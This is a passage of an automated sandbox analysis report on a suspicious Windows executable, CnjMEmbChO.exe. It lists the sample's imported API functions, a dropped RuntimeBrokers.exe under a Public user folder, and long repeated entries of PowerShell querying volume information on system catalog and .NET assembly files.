Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00401F9D
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\CnjMEmbChO.exeCode function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401626
